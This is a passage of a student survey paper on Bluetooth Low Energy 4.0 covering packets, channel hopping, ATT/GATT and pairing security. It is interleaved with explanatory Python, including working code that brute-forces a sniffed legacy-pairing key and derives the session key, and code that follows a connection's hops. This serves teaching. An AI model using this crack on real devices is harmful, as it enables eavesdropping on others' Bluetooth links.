
Bluetooth Low Energy Version 4.0
Helping create the internet of things
Julio Villegas

I. INTRODUCTION
We rely more and more on our smartphones and tablets to connect to the internet, to stream audio in
our cars and even in our home entertainment systems, and as the number of peripheral devices we
connect to grows, so does the need for more efficient ways of doing so. Traditional Bluetooth has
given us the ability to connect quickly and easily to peripheral devices, but with the release of
Bluetooth Low Energy in version 4.0 (BLE) the types of peripheral devices we connect to have spilled
over into the medical and sports fields in remarkable ways.
In this paper I compare BLE 4.0 with Classic Bluetooth in terms of advantages, disadvantages,
security threats, energy efficiency, transmission protocols and transmission rates, and survey the
performance and security of BLE along with the innovative ways in which it is being deployed.

II. BLUETOOTH
A. Classic Bluetooth
Classic Bluetooth is used for short-range wireless communication between devices in networks
where nodes can easily come and go. It uses 79 channels of 1 MHz in the 2.4 GHz ISM band with a
pseudo-random frequency hopping sequence (1600 hops per second). In a Piconet the Master device
establishes the frequency hopping sequence, which is derived from its device address and clock, and
can have up to 7 active Slaves. A device can be in more than one Piconet, and overlapping Piconets
form a Scatternet. This paper focuses on Bluetooth Low Energy, and since details on Classic
Bluetooth have already been covered in class, I will focus on describing BLE.

B. Bluetooth Low Energy (BLE)


BLE implements an entirely new protocol stack along with new profiles and applications. Its
core objective is to run for a very long time on a coin-cell battery. Its client/server attribute
model also lets small devices that previously had no efficient way to reach the internet expose their
data to an internet-connected device such as a phone. BLE is designed to be easy and cheap to
develop for.

Radio Frequency. Bluetooth LE operates in the 2.4 GHz ISM band with only 40 channels
spaced 2 MHz apart. It transmits at 1 Mbit/s using GFSK modulation. Like Classic Bluetooth it
uses adaptive frequency hopping, but it hops far less often: once per connection event rather
than 1600 times per second. Three of the 40 channels (37, 38 and 39, placed between the busy
Wi-Fi channels 1, 6 and 11) are used for advertising, which allows device discovery. After a device
is discovered and connected, the remaining 37 channels (0 to 36) are used to transmit data.

Figure 1: BLE uses 40 channels in the 2.4GHz ISM band. Channels in green are used for advertising.

Modes. For the most part there are four basic modes a BLE device can operate in: master
device mode, slave device mode, advertising mode and scanning mode. Advertising mode is
used by a BLE device to periodically broadcast information that can be used to establish a
link; it can also use this mode to respond to additional queries (scan requests) another device
might make. Scanning mode is used to capture advertising packets. Slave and master modes are
used once a link has been established between two devices, and their primary function is to let
the devices read, write and query each other. The device that starts out in advertising mode
assumes the slave role, and conversely the device that was initially scanning (and then
initiated the connection) assumes the master role.

Packet Format. There are two types of packets, data and advertising, each of variable
length. A BLE packet consists of an 8-bit preamble, a 32-bit access address (the fixed value
0x8E89BED6 on the advertising channels and a random per-connection value on the data channels),
a PDU of 2 to 39 bytes and a 24-bit CRC. This means the shortest packet is 80 bits and the longest
is 376 bits, and at 1 Mbit/s the transmission time ranges from 80 microseconds to about
0.38 milliseconds. Advertising PDUs contain a 16-bit header, the 6-byte advertiser address and
up to 31 bytes of advertising data.

Figure 2: Bluetooth 4.0 Data packet format.
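The packet layout described above, worked through in code. This is an added example, not code from the paper: it assembles and dissects an advertising-channel packet (preamble, access address, header, AdvA, AdvData, CRC), computes the 80 to 376 bit air time, and parses the AD structures inside the 31 bytes of advertising data, including the length check a sniffer or phone stack must make so a malformed advertisement cannot make it read past the buffer. The CRC uses the spec's polynomial and advertising preset, but its byte serialisation here is only checked for self-consistency; the device address and advertising payload are constructed sample values.

```python
"""Build and dissect a Bluetooth 4.0 LE advertising-channel packet (1 Mbit/s air interface)."""

ADV_ACCESS_ADDRESS = 0x8E89BED6  # fixed on channels 37/38/39; data channels use a per-connection value
ADV_CRC_INIT = 0x555555          # CRC preset on advertising channels; data channels use CRCInit from CONNECT_REQ
PDU_TYPES = {0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_NONCONN_IND", 3: "SCAN_REQ",
             4: "SCAN_RSP", 5: "CONNECT_REQ", 6: "ADV_SCAN_IND"}
AD_TYPES = {0x01: "Flags", 0x02: "Incomplete 16-bit UUIDs", 0x03: "Complete 16-bit UUIDs",
            0x08: "Shortened Local Name", 0x09: "Complete Local Name", 0xFF: "Manufacturer Specific"}


def air_time_us(pdu_len):
    """Bits on air for one packet: 8 preamble + 32 access address + PDU + 24 CRC; 1 bit per microsecond."""
    if not 2 <= pdu_len <= 39:
        raise ValueError("a 4.0 PDU is 2..39 bytes")
    return 8 + 32 + 8 * pdu_len + 24


def ble_crc24(pdu, init=ADV_CRC_INIT):
    """24-bit CRC LFSR, polynomial x^24+x^10+x^9+x^6+x^4+x^3+x+1 (0x00065B), data bits fed LSB first."""
    crc = init
    for byte in pdu:
        for i in range(8):
            feedback = ((byte >> i) & 1) ^ ((crc >> 23) & 1)
            crc = (crc << 1) & 0xFFFFFF
            if feedback:
                crc ^= 0x00065B
    return crc


def parse_ad_structures(adv_data):
    """AdvData is a chain of (length, AD type, data) structures; length counts the type byte plus data."""
    out, i = [], 0
    while i < len(adv_data):
        n = adv_data[i]
        if n == 0:  # zero-length structure ends the chain; anything after it is padding
            break
        if i + 1 + n > len(adv_data):
            raise ValueError("AD structure length overruns AdvData")  # malformed advert: reject, never read past the buffer
        ad_type, data = adv_data[i + 1], adv_data[i + 2:i + 1 + n]
        if ad_type in (0x08, 0x09):
            value = data.decode("utf-8", "replace")
        elif ad_type in (0x02, 0x03):
            value = ["0x%04X" % int.from_bytes(data[j:j + 2], "little") for j in range(0, len(data) - 1, 2)]
        elif ad_type == 0x01 and data:
            value = {"limited_discoverable": bool(data[0] & 1),
                     "general_discoverable": bool(data[0] & 2),
                     "br_edr_not_supported": bool(data[0] & 4)}
        else:
            value = data.hex()
        out.append((AD_TYPES.get(ad_type, "0x%02X" % ad_type), value))
        i += 1 + n
    return out


def build_adv_packet(pdu_type, adv_addr, adv_data, txadd=1):
    """Preamble | access address | header | AdvA | AdvData | CRC, as an ADV_IND-style advertiser sends it."""
    if len(adv_data) > 31:
        raise ValueError("AdvData is limited to 31 bytes")
    payload = adv_addr[::-1] + adv_data  # AdvA goes on air least-significant octet first
    header = bytes([(pdu_type & 0x0F) | (txadd << 6), len(payload) & 0x3F])  # TxAdd=1: random address
    pdu = header + payload
    return bytes([0xAA]) + ADV_ACCESS_ADDRESS.to_bytes(4, "little") + pdu + ble_crc24(pdu).to_bytes(3, "little")


def parse_adv_packet(frame):
    """Dissect a raw advertising-channel packet; rejects a wrong access address, bad length or bad CRC."""
    if len(frame) < 10 or int.from_bytes(frame[1:5], "little") != ADV_ACCESS_ADDRESS:
        raise ValueError("not an advertising-channel packet")
    pdu, crc = frame[5:-3], int.from_bytes(frame[-3:], "little")
    if len(pdu) != 2 + (pdu[1] & 0x3F):
        raise ValueError("length field does not match the packet")
    if ble_crc24(pdu) != crc:
        raise ValueError("CRC mismatch")
    pdu_type = pdu[0] & 0x0F
    info = {"pdu_type": PDU_TYPES.get(pdu_type, "RFU"), "txadd": (pdu[0] >> 6) & 1,
            "air_time_us": air_time_us(len(pdu)), "adv_addr": None, "ad": []}
    if pdu_type in (0, 2, 4, 6):  # PDU types laid out as AdvA + AdvData
        info["adv_addr"] = pdu[2:8][::-1].hex(":")
        info["ad"] = parse_ad_structures(pdu[8:])
    return info


# Constructed sample: a heart-rate monitor advertising Flags, the Heart Rate service UUID and its name.
DEMO_ADV_ADDR = bytes.fromhex("C0FFEE010203")  # made-up random static address
DEMO_ADV_DATA = bytes.fromhex("020106") + bytes.fromhex("03030D18") + bytes([9, 0x09]) + b"HRM-demo"

if __name__ == "__main__":
    print(parse_adv_packet(build_adv_packet(0, DEMO_ADV_ADDR, DEMO_ADV_DATA)))
```

Everything `parse_adv_packet` returns for the sample (address, service UUID, name, discoverable flags) is learned without a connection, which is the point the Pairing Process paragraph makes about how much a scanner sees for free.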

Pairing Process. There are three ways two devices can pair in Bluetooth 4.0: Just Works, Out of
Band and Passkey Entry. Before that, an advertising device transmits packets on the advertising
channels with a PDU containing its device address and up to 31 bytes of additional information. A
scanning device sees the address and, depending on the advertiser, can request additional
information (a scan response). What this means is that a good amount of information can be
obtained about a device without even establishing a connection. Advertising is done sequentially
on the three advertising channels at an interval between 20 ms and 10.24 s depending on
configuration. A scanning device, on the other hand, is configured with a scan window (how long
to listen) and a scan interval (how often to listen). When it initiates a connection, the scanner
supplies the advertiser, in its connection request, with two critical parameters: the connection
interval and the slave latency. The connection interval determines the start time of connection
events; a connection event is simply an exchange of data packets. Slave latency is the number of
connection events the slave may ignore without losing the connection; this is done to save power.
A third parameter, the supervision timeout, bounds how long either side waits without hearing
from the other before it declares the link lost.

Data Exchange. After a link is established, communication is carried out over the 37 data
channels. Each data PDU carries a 16-bit header and up to 27 bytes of payload; when the link is
encrypted a 4-byte Message Integrity Check (MIC) is appended. A connection event is initiated by
the master device, with packets alternating between master and slave until one of them stops
transmitting.
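The channel selection and timing parameters from the two paragraphs above, as an added example that is not part of the paper. It implements the 4.0 link layer's hop selection algorithm #1 (unmapped channel = (last + hopIncrement) mod 37, remapped through the used-channel table when that channel is masked out), the connection interval / slave latency / supervision timeout arithmetic, and a `follow` function showing that a sniffer holding the connection request fields knows the channel and time of every connection event; the `DEMO_CONNECT_REQ` values are constructed.

```python
"""Bluetooth 4.0 data-channel hopping (hop selection algorithm #1) and connection-event timing."""

HOP_INCREMENT_RANGE = range(5, 17)  # the 5-bit hop field in CONNECT_REQ must be 5..16
ALL_CHANNELS = (1 << 37) - 1        # channel map: bit n set means data channel n is in use


def used_channels(channel_map):
    """Ascending list of the data channels enabled in a 37-bit channel map."""
    chans = [n for n in range(37) if (channel_map >> n) & 1]
    if len(chans) < 2:
        raise ValueError("the spec requires at least two used data channels")
    return chans


def next_channel(last_unmapped, hop_increment, channel_map):
    """One step of hop selection algorithm #1: returns (new unmapped channel, channel actually used)."""
    if hop_increment not in HOP_INCREMENT_RANGE:
        raise ValueError("hopIncrement must be 5..16")
    unmapped = (last_unmapped + hop_increment) % 37
    if (channel_map >> unmapped) & 1:
        return unmapped, unmapped
    used = used_channels(channel_map)
    return unmapped, used[unmapped % len(used)]  # remapping index into the ascending used-channel table


def channel_sequence(hop_increment, channel_map, events, last_unmapped=0):
    """Channels of the next `events` connection events; lastUnmappedChannel starts at 0 on a new link."""
    seq = []
    for _ in range(events):
        last_unmapped, ch = next_channel(last_unmapped, hop_increment, channel_map)
        seq.append(ch)
    return seq


def connection_timing(interval_units, slave_latency, timeout_units):
    """CONNECT_REQ timing: interval in 1.25 ms units (6..3200, i.e. 7.5 ms..4 s) and supervision
    timeout in 10 ms units (10..3200). Reports the derived times and whether the 4.0 constraints hold:
    slave latency below 500 and supervision timeout > 2 * (1 + latency) * interval."""
    if not 6 <= interval_units <= 3200 or not 10 <= timeout_units <= 3200:
        raise ValueError("connection interval or supervision timeout out of range")
    interval_ms = interval_units * 1.25
    longest_sleep_ms = (1 + slave_latency) * interval_ms  # a slave may legitimately skip this many intervals
    timeout_ms = timeout_units * 10
    return {"interval_ms": interval_ms, "longest_sleep_ms": longest_sleep_ms, "timeout_ms": timeout_ms,
            "valid": slave_latency < 500 and timeout_ms > 2 * longest_sleep_ms}


# Constructed stand-in for a parsed CONNECT_REQ: every field below is sent in the clear on an advertising channel.
DEMO_CONNECT_REQ = {"access_address": 0x50655A9B, "crc_init": 0x1F2E3D, "interval": 24, "latency": 4,
                    "timeout": 300, "channel_map": ALL_CHANNELS & ~((1 << 5) | (1 << 11)), "hop": 7}


def follow(connect_req, events):
    """Where and when a passive sniffer that captured CONNECT_REQ tunes for each of the next events:
    list of (event number, start offset in ms, data channel). No key or address knowledge is needed."""
    interval_ms = connect_req["interval"] * 1.25
    chans = channel_sequence(connect_req["hop"], connect_req["channel_map"], events)
    return [(n, n * interval_ms, ch) for n, ch in enumerate(chans)]


if __name__ == "__main__":
    print(follow(DEMO_CONNECT_REQ, 8))
    print(connection_timing(DEMO_CONNECT_REQ["interval"], DEMO_CONNECT_REQ["latency"], DEMO_CONNECT_REQ["timeout"]))
```

Because the whole sequence is a deterministic function of the hop increment and channel map, the hopping on a BLE link is a radio-coexistence feature, not a secrecy feature; the security section returns to this.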

BLE Protocol Stack. The BLE protocol stack is partitioned into a Controller and a Host.
The Controller handles the lower layers of the stack: the physical layer (the radio) and the Link
Layer that sends and receives physical packets. The Host handles the upper layers: L2CAP, the
Attribute Protocol, the Security Manager, the profiles and the application. The Host and
Controller can be either collocated on one chip, or the Host can run on the application processor
together with the application. In the second option the Host Controller Interface (HCI) is used
by the Controller and Host to communicate.

Figure 3: BLE protocol stack.

i. Controller. The Link Layer controller captures physical packets from the air; it also
manages timing and the queues of incoming and outgoing packets. In short, it is
responsible for physical-level data flow. It can also act as a firewall for the device by
filtering packets from specific devices through the Link Layer white list.
ii. L2CAP. The controller communicates with the Logical Link Control and Adaptation
Protocol (L2CAP) via the HCI, or directly if collocated. The main function of this
component is to provide data services to the upper layers, multiplexing protocols over the
link and segmenting packets into fragments for the controller. Conversely, it reassembles
packets from the controller before they are routed to the upper layers.
iii. GAP. The Generic Access Profile (GAP) defines the generic procedures used in
discovering, connecting and pairing devices. It is the interface through which the
application layer uses the different Bluetooth modes (advertising, scanning, etc.).
iv. SM. The Security Manager (SM) handles authentication and encryption. It uses the
AES-128 encryption engine to do so and is also responsible for pairing and key
distribution. The SM runs in the Host of both devices, but the design leans on the master
to do the heavier computation, easing the demands of security on the slave.
v. ATT. The Attribute Protocol (ATT) is a communication method designed to optimize the
transmission of small packets. An attribute is a (handle, type, value) entry exposed by an
ATT server; an ATT client can discover attributes by handle or type and read or write
their values.
vi. GATT. Another component is the Generic Attribute Profile (GATT), which describes the
service framework built on top of ATT (services, characteristics and descriptors) and is
specific to Bluetooth LE in 4.0. It interfaces with the application layer through the
application profiles. Each application profile defines data formatting and how it should be
interpreted by the application. Profiles improve power efficiency by reducing the
amount of data exchanged. They are designed for specific functionality; for
example there are Heart Rate, Glucose and Alert Notification profiles
among dozens of others. This makes it easy for developers to create
applications aimed at specific functionality using the predefined attribute/value pairs
found in each profile.
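The ATT/GATT layers described in items v and vi, as an added example rather than anything from the paper: a tiny ATT server holding the attribute table of the Heart Rate profile (service declaration 0x2800, characteristic declarations 0x2803, the Heart Rate Measurement 0x2A37 and Body Sensor Location 0x2A38 characteristics), the permission checks an ATT server applies before answering a read (returning the Insufficient Encryption / Insufficient Authentication error codes that make a well-behaved client pair first), primary-service discovery, and the profile-defined encoding of a Heart Rate Measurement value. The real profile delivers measurements by notification only; the measurement is made readable here so the permission check is visible. The UUIDs and error codes are the assigned values; the table contents are constructed.

```python
"""A minimal ATT/GATT server for the Heart Rate profile, with the permission checks an ATT server applies."""
from dataclasses import dataclass

PRIMARY_SERVICE, CHARACTERISTIC, CCCD = 0x2800, 0x2803, 0x2902  # GATT declaration UUIDs
HEART_RATE_SERVICE, HEART_RATE_MEASUREMENT, BODY_SENSOR_LOCATION = 0x180D, 0x2A37, 0x2A38
ERR_INVALID_HANDLE, ERR_READ_NOT_PERMITTED = 0x01, 0x02  # ATT Error Response codes
ERR_INSUFFICIENT_AUTHENTICATION, ERR_ATTRIBUTE_NOT_FOUND, ERR_INSUFFICIENT_ENCRYPTION = 0x05, 0x0A, 0x0F


@dataclass
class Attribute:
    handle: int
    uuid: int
    value: bytes
    readable: bool = True
    needs_encryption: bool = False      # LE Security Mode 1 level 2: link encrypted after any pairing
    needs_authentication: bool = False  # LE Security Mode 1 level 3: MITM-protected pairing required


@dataclass
class Link:
    encrypted: bool = False
    authenticated: bool = False


class AttServer:
    def __init__(self, attributes):
        self.attrs = {a.handle: a for a in attributes}

    def read(self, link, handle):
        """ATT Read Request -> (value, None), or (None, error code) as an Error Response would carry."""
        a = self.attrs.get(handle)
        if a is None:
            return None, ERR_INVALID_HANDLE
        if not a.readable:
            return None, ERR_READ_NOT_PERMITTED
        if a.needs_authentication and not link.authenticated:
            return None, ERR_INSUFFICIENT_AUTHENTICATION
        if a.needs_encryption and not link.encrypted:
            return None, ERR_INSUFFICIENT_ENCRYPTION  # the client is expected to pair/encrypt and retry
        return a.value, None

    def discover_primary_services(self, start=0x0001, end=0xFFFF):
        """Read By Group Type for 0x2800 -> ([(start handle, end handle, service UUID)], None) or an error."""
        handles = sorted(h for h in self.attrs if start <= h <= end)
        decls = [h for h in handles if self.attrs[h].uuid == PRIMARY_SERVICE]
        if not decls:
            return None, ERR_ATTRIBUTE_NOT_FOUND
        out = []
        for i, h in enumerate(decls):
            last = decls[i + 1] - 1 if i + 1 < len(decls) else handles[-1]
            out.append((h, last, int.from_bytes(self.attrs[h].value, "little")))
        return out, None


def encode_heart_rate(bpm, rr_intervals_ms=()):
    """Heart Rate Measurement value: flags byte, then uint8 or uint16 bpm, then RR intervals in 1/1024 s."""
    flags = (0x01 if bpm > 255 else 0) | (0x10 if rr_intervals_ms else 0)
    body = bytes([flags]) + (bpm.to_bytes(2, "little") if flags & 0x01 else bytes([bpm]))
    for rr in rr_intervals_ms:
        body += round(rr * 1024 / 1000).to_bytes(2, "little")
    return body


def decode_heart_rate(value):
    """Parse a Heart Rate Measurement value according to its flags byte."""
    flags, i = value[0], 1
    if flags & 0x01:
        bpm, i = int.from_bytes(value[1:3], "little"), 3
    else:
        bpm, i = value[1], 2
    energy = None
    if flags & 0x08:  # Energy Expended field present (uint16, kJ)
        energy, i = int.from_bytes(value[i:i + 2], "little"), i + 2
    rr = []
    if flags & 0x10:  # one or more RR-Interval fields follow
        while i + 1 < len(value):
            rr.append(int.from_bytes(value[i:i + 2], "little") * 1000 / 1024)
            i += 2
    return {"bpm": bpm, "sensor_contact": (flags >> 1) & 0x03, "energy_kj": energy, "rr_ms": rr}


def heart_rate_server(measurement):
    """Constructed attribute table of a Heart Rate Service; the measurement needs an encrypted link."""
    return AttServer([
        Attribute(0x0001, PRIMARY_SERVICE, HEART_RATE_SERVICE.to_bytes(2, "little")),
        # characteristic declaration value: properties | value handle | characteristic UUID
        Attribute(0x0002, CHARACTERISTIC, bytes([0x12]) + (0x0003).to_bytes(2, "little") + HEART_RATE_MEASUREMENT.to_bytes(2, "little")),
        Attribute(0x0003, HEART_RATE_MEASUREMENT, measurement, needs_encryption=True),
        Attribute(0x0004, CCCD, bytes(2)),  # client writes 0x0001 here to enable notifications
        Attribute(0x0005, CHARACTERISTIC, bytes([0x02]) + (0x0006).to_bytes(2, "little") + BODY_SENSOR_LOCATION.to_bytes(2, "little")),
        Attribute(0x0006, BODY_SENSOR_LOCATION, bytes([0x01])),  # 0x01 = chest
    ])
```

A phone that gets error 0x0F back on the measurement handle starts pairing and retries the read over the encrypted link; a server that returns the value regardless of link state is the design mistake this check guards against.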

Low Energy. There are a few ways Bluetooth 4.0 achieves its increased power efficiency.
First, it uses a lower duty cycle: the device sleeps for longer periods and wakes less
frequently to send or receive packets. Second, using the GATT profiles it sends small data
packets (exposing state) in short bursts. Data transmission can be triggered by a local event,
and the data is available for a client to access at any time. Lastly, it does not maintain links
with devices when it is not communicating; the device goes to sleep and ends the link once the
exchange is complete, and a link is rapidly re-established (in a few milliseconds) upon the next
exchange.
So how much less power does BLE consume than Classic Bluetooth? It depends on the
device and implementation, but generally we can see (Figure 4) that the transmit time is
much shorter, from Classic Bluetooth's 100 ms to BLE's 3 ms. We can also see that the peak
current consumption is 10 mA less and in best-case scenarios power consumption is 1/100th
that of Classic Bluetooth.

C. Bluetooth Classic vs. Bluetooth Low Energy


With BLE, Bluetooth has made a paradigm shift in design. Bluetooth 2.0 EDR and Bluetooth 3.0
HS were designed with faster data rates in mind; in contrast, BLE 4.0 was designed with lower
power consumption in mind. BLE 4.0 is not designed to stream large amounts of data; it is
designed to periodically send short bursts of data. There are two types of Bluetooth 4.0 devices:
dual-mode, which is backwards compatible with previous Bluetooth versions, and single-mode,
which only supports BLE. Dual-mode devices that perform high-data-rate streaming do not benefit
from the low power consumption of BLE, which is only achieved when the BLE low-data-rate
mode is used. Figure 4 lists the technical details of each and makes it clear that it
is not a question of which is better, but which is better suited for a specific application.
BLE 4.0 is not intended to completely replace previous versions (it can where that makes sense);
for the most part it has opened the door for new uses of Bluetooth.

Figure 4: Technical comparison of classic Bluetooth and BLE

III. BLUETOOTH LE 4.0 USES


Bluetooth LE achieves a few new features through its implementation. First, the obvious
lowered power consumption gained by very low peak, average and idle-mode power
consumption. Second, it can run a device for years on a standard coin-cell battery, making
maintenance easy. Third, it has a very low cost, since most devices come with Bluetooth already
available. Fourth, any device bearing the Bluetooth logo interoperates with every other,
independent of vendor.

The characteristics of BLE make it a suitable candidate for small devices that need to maintain a
fairly dependable communication link to other devices or a larger network. What type of small
devices? They range from pedometers, blood pressure and pulse monitors to watches
and tags. These devices can in turn connect to local devices with internet access, making this
data available anywhere. For example, a pedometer can send distance data to a person's cell
phone, which can then send it to the internet over the phone's 4G connection. Devices
bearing the Bluetooth SMART (single-mode) or Bluetooth SMART READY (dual-mode) logo are
BLE 4.0 capable. Some ways they are being used include the following.
Smart Energy
These can be meters, gauges or displays found around the home or office. Data from these
devices can be tracked and monitored from anywhere by having them transmit to a local device
with internet connectivity. They can also be paired with a person's watch so that temperature
settings or lights are adjusted whenever a particular person is in a room. This not only makes life
easier, it also makes smarter use of energy.
Health & Wellness
Some devices bearing the BLE logo include heart rate and glucose monitors. Combined with a
centralized application they can be used for assisted living. For example, right now there are
devices that continually monitor a diabetic person's sugar level, but they simply set off a
beeping sound whenever those sugar levels spike. With BLE, such a device can be set up to send
those sugar levels to a centralized application on the internet that monitors for dangerous
irregularities. Emergency personnel can be dispatched to help whenever a person's vitals fall
within a certain range.
Sports & Fitness
When it comes to sports and fitness the focus is on tracking vitals and location. There are
several sports heart rate monitors on the market that track an athlete's vitals throughout a
workout. Tracking these vitals also helps athletes reach their optimal heart rate zone to
maximize the workout. Another implementation is an athletic shoe that tracks quickness,
vertical jump and calories burned. When it comes to location, several Garmin devices use BLE
to connect to a user's cell phone and exchange location data. This can include
exchanging maps, trails and current location with other people.

IV.BLUETOOTH SECURITY
A. Security Features
There are several ways security is built into BLE, although some of the protections commonly
listed are weaker than they sound. Frequency hopping is often cited as making it difficult for an
attacker to sniff data, since the devices constantly change the channel they communicate on; in BLE,
however, the hop sequence is fully determined by the hop increment and channel map sent in the
clear in the connection request, so hopping only hinders an attacker who missed the connection
setup. There are also three GAP discoverable modes: in General Discoverable mode a device
advertises so that any scanner can find it; in Limited Discoverable mode it advertises as discoverable
only for a limited time (for example after a button press) and then returns to Non-Discoverable
mode; in Non-Discoverable mode it does not advertise itself as discoverable at all. Discoverability
only governs whether a device is found by a discovery procedure; whether it accepts connections and
pairing is configured separately. Another form of protection is the Bluetooth device address. In
Classic Bluetooth the address, together with the master's clock, determines the hopping sequence
and timing, and only its lower 24 bits (the LAP) are included in every packet, so an eavesdropper
must recover the rest of the address before it can follow the hopping. BLE does not derive its
hopping from the address, but it supports resolvable private addresses that change over time so a
device cannot be tracked by its address. The security modes described in many Bluetooth
references (Mode 1: no security; Mode 2: service-level security enforced in software after the
link is established; Mode 3: link-level security enforced before the link is established) are
Classic Bluetooth's modes. BLE instead defines LE Security Mode 1 (link encryption, at levels of
no security, unauthenticated pairing with encryption, and authenticated pairing with encryption)
and LE Security Mode 2 (data signing without encryption). Encryption in BLE is done with
128-bit AES in CCM mode, which is infeasible to brute-force; as the next section shows, the weak
point is how the key is established, not the cipher. Finally, a device can require a six-digit
passkey (or an out-of-band channel) when establishing the pairing, which is what protects the
pairing against a man in the middle.

B. Sniffing Vulnerabilities
With all the security features built into BLE, it seems a user could simply make their device
Non-Discoverable, require an encrypted link with authenticated pairing, and use a passkey to
establish the pairing (when the device allows it). There is, however, one glaring security hole
in the pairing process. The pairing exchange is not encrypted, and those packets can be captured
by an attacker eavesdropping on the link. Because the temporary key the exchange is built on has
almost no entropy (it is zero for Just Works and a six-digit number for Passkey Entry), the
captured packets can be used to recover the short-term key and then every key distributed under
it, after which the attacker can eavesdrop, insert legitimate-looking packets, or both. It is
important to note that once the two devices are bonded, subsequent connections are encrypted
with the stored long-term key without pairing again. This means the heart of the problem lies
where the two devices pair for the first time, or when they have to re-establish their keys.
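The pairing weakness above in concrete Bluetooth 4.0 terms, as an added example that is not from the paper. In LE legacy pairing each side sends a confirm value c1(TK, rand, ...) and then its random number; c1 and the STK derivation s1 are AES-128 over the temporary key TK, which is 0 for Just Works and the passkey for Passkey Entry. The block implements AES-128 from scratch (no third-party library), the spec's c1 and s1 functions, a constructed pairing exchange standing in for what a sniffer would record, and the offline brute force of the TK from those sniffed values; this is the attack published by Mike Ryan in 2013 and automated in the crackle tool. The Pairing Request/Response bytes, addresses and random values are constructed sample data. Exhausting all 10^6 passkeys takes seconds in C; with this pure-Python AES it takes minutes, so the demo uses a small passkey and a bound on the search.

```python
"""Why a sniffed Bluetooth 4.0 LE legacy pairing leaks the STK: the confirm values are AES-128 over a
temporary key (TK) with almost no entropy, so the TK and then the STK can be brute-forced offline."""


def _gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return p


def _sbox_entry(x):
    inv = 1
    for _ in range(254):  # x^254 is the multiplicative inverse in GF(2^8); 0 maps to 0
        inv = _gmul(inv, x)
    s = inv
    for i in range(1, 5):  # affine transform: XOR of four left rotations, plus the constant 0x63
        s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
    return s ^ 0x63


SBOX = [_sbox_entry(x) for x in range(256)]
MUL2 = [_gmul(x, 2) for x in range(256)]
MUL3 = [_gmul(x, 3) for x in range(256)]


def _round_keys(key):
    """AES-128 key expansion: 44 words, returned as 11 flat 16-byte round keys."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = MUL2[rcon]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def aes128_encrypt(key, block):
    """Single-block AES-128 (FIPS-197), state kept flat in column-major order; this is the SM's e(k, m)."""
    rk = _round_keys(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                             # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]  # ShiftRows: row r rotates left by r
        if rnd < 10:                                         # MixColumns on every round but the last
            m = []
            for c in range(0, 16, 4):
                a0, a1, a2, a3 = s[c:c + 4]
                m += [MUL2[a0] ^ MUL3[a1] ^ a2 ^ a3, a0 ^ MUL2[a1] ^ MUL3[a2] ^ a3,
                      a0 ^ a1 ^ MUL2[a2] ^ MUL3[a3], MUL3[a0] ^ a1 ^ a2 ^ MUL2[a3]]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]              # AddRoundKey
    return bytes(s)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def smp_c1(k, r, preq, pres, iat, rat, ia, ra):
    """Confirm value, Core 4.0 Vol 3 Part H 2.2.3: e(k, e(k, r XOR p1) XOR p2), most-significant octet first."""
    p1 = pres + preq + bytes([rat, iat])  # 7 + 7 + 1 + 1 bytes
    p2 = bytes(4) + ia + ra               # 4 bytes padding + initiator address + responder address
    return aes128_encrypt(k, _xor(aes128_encrypt(k, _xor(r, p1)), p2))


def smp_s1(k, r1, r2):
    """STK = s1(TK, Srand, Mrand) = e(TK, least-significant 8 octets of r1 || of r2)."""
    return aes128_encrypt(k, r1[8:] + r2[8:])


def tk_from_passkey(passkey):
    return passkey.to_bytes(16, "big")  # Just Works is simply passkey 0, i.e. TK = 0


def simulate_pairing(passkey, mrand, srand):
    """Constructed exchange: the clear-text values a sniffer records, plus the STK the two devices derive."""
    cap = {"preq": bytes.fromhex("01040001100101"),  # Pairing Request: KeyboardDisplay, no OOB, bonding, key size 16
           "pres": bytes.fromhex("02000001100101"),  # Pairing Response: DisplayOnly
           "iat": 0, "ia": bytes.fromhex("001122334455"), "rat": 1, "ra": bytes.fromhex("C0FFEE010203"),
           "mrand": mrand, "srand": srand}
    tk = tk_from_passkey(passkey)
    cap["mconfirm"] = smp_c1(tk, mrand, cap["preq"], cap["pres"], cap["iat"], cap["rat"], cap["ia"], cap["ra"])
    cap["sconfirm"] = smp_c1(tk, srand, cap["preq"], cap["pres"], cap["iat"], cap["rat"], cap["ia"], cap["ra"])
    return cap, smp_s1(tk, srand, mrand)


def crack_tk(cap, max_passkey=999_999):
    """Offline brute force over the passkey space using only sniffed values; returns (passkey, STK) or None."""
    for pk in range(max_passkey + 1):
        tk = tk_from_passkey(pk)
        if smp_c1(tk, cap["mrand"], cap["preq"], cap["pres"], cap["iat"], cap["rat"], cap["ia"], cap["ra"]) == cap["mconfirm"]:
            return pk, smp_s1(tk, cap["srand"], cap["mrand"])
    return None
```

With the STK in hand the attacker decrypts the key-distribution phase that follows and so obtains the long-term key used for every later connection, which is why the page's advice to worry about the first pairing (and any forced re-pairing) is the right focus. Out of Band pairing with a 128-bit random TK is the one legacy method this search does not break.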

C. Implementing a Sniffing Attack


There are several industry tools, like Frontline's ComProbe FTS4BT protocol analyzer and packet
sniffer, made for developers to test their applications for security and performance.
They can also be used maliciously to eavesdrop on connections, but like other industry
tools they are very expensive and may not be worth the trouble. Another option is to build such
a device from scratch. For Classic Bluetooth there are four major obstacles an attacker has to
overcome to implement a sniffing attack. First, the attacker needs to listen on the channel in
promiscuous mode to capture all traffic. Second, the packets need to be unwhitened
(descrambled) to make sense of their contents. Third, the attacker needs to figure out the
Bluetooth device's address, since that along with the master's clock is used to calculate the
hopping sequence. Finally, the attacker needs to force the two devices to re-pair and establish a
